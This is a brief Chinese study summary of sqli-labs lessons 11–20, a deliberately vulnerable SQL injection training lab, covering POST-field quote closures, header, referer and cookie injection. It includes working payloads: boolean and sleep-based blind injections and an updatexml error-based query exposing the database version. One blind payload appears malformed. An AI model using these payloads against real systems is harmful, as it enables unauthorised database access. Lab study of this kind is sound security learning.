Sqli-labs学习SQL注入-Lesson 11-20总结

LE11- 简单的POST注入 闭合      '

LE12-简单的POST注入 闭合       ")

LE13-简单的POST注入 闭合       ')  测试的时候多用'  " 然后判断语句怎么写的

LE14- 简单的POST注入 闭合      "

LE15- 简单的POST注入-盲注

                没有报错提示 只能用盲注 就是利用真假

                uname=1&passwd=2' or length(length(database()=7)) %23

LE16-简单的POST注入-盲注

                 都是基于LE11-14的环境 没有报错提示 需要我们去多点尝试判断

                 uname=a&passwd=a")  or if(length(database())=7,1,sleep(5)) #

                 uname=a&passwd=a")  or if(length(database())=8,1,sleep(5)) #

LE17-POST注入

                  报错类型注入来获取信息  需要先闭合语句 不然没作用

                 updatexml(2,concat(0x262b,version(),0x292b),1) %23

LE18-POST注入

                    简单的agent头注入

LE19-POST注入

                    简单的reffer注入

LE20-POST注入

                                         简单的COOKIE注入